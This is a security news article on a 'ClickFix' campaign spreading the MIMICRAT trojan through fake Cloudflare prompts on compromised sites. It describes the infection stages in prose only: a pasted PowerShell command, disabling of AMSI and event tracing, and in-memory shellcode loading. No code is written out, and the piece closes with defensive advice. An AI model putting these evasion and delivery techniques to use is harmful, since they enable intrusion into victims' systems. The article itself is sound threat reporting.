A sophisticated new cyber campaign has been discovered that uses a trick called "ClickFix" to spread a unique remote access trojan called MIMICRAT This article explores infiltrated malicious javascript. . By using social engineering instead of software exploits, this operation circumvents conventional security measures by compromising trustworthy websites to act as delivery vectors.

Global businesses are at serious risk from the malware, which is a multipurpose, native C++ implant made for long-term stealth and persistence. When a user visits a trusted website—like a financial tool—that has been covertly infiltrated with malicious JavaScript, the attack sequence begins. In order to fix a purported browser error, the victim is instructed to copy and run a particular PowerShell command by this script, which displays a phony Cloudflare verification pop-up.

This "ClickFix" strategy successfully gets around browser-based download safeguards by taking advantage of user trust. This intricate threat was discovered by Elastic analysts in early February 2026 after they noticed that it successfully eluded detection by using five different infection stages. Bincheck.io page source displaying the injected script loading jq.php from investonline.in (Source: Elastic) The researchers emphasized that the campaign targets multiple industries by dynamically localizing lures into 17 different languages, guaranteeing broad reach across various geographies.

They pointed out that attackers can quickly modify their strategies thanks to the malware's modular design. The last payload, MIMICRAT, has sophisticated features like file system manipulation, SOCKS5 tunneling, and Windows token theft. It uses adaptable HTTP profiles that blend in with authentic web analytics traffic to communicate with command-and-control servers while maintaining persistence.

Because the malicious signals are concealed among typical background noise, this sophisticated camouflage makes it very difficult for network defenders to identify them. Covert Infection and Implementation Through a series of deliberate, obfuscated steps, the infection mechanism is designed to evade contemporary defenses. A highly obfuscated second script is downloaded to disable Windows Event Tracing and the Antimalware Scan Interface (AMSI) following the first PowerShell execution.

This crucial step renders security tools inoperable, enabling the following phases to function on the victim's computer without producing the usual alerts. After these workarounds, the final shellcode is decrypted and run entirely in system memory using a Lua-based loader.

Because MIMICRAT only lives in RAM thanks to this fileless technique, its digital footprint is greatly reduced, making forensic analysis more difficult for security teams trying to track down the intrusion. The attack flow is further muddled by the use of a custom Lua loader. Powershell execution that has been obscured (Source: Elastic) Organizations must improve user training to identify phony browser verification prompts and steer clear of pasting unknown commands in order to protect against this threat.

Strict PowerShell execution guidelines should be implemented, and security teams should keep an eye out for obfuscated command lines. In order to break the attack chain before data exfiltration takes place, it is also essential to block known malicious domains and examine network traffic for MIMICRAT's unique communication patterns. Set ZeroOwl as a Preferred Source in Google and use X, LinkedIn, and LinkedIn to receive more real-time updates.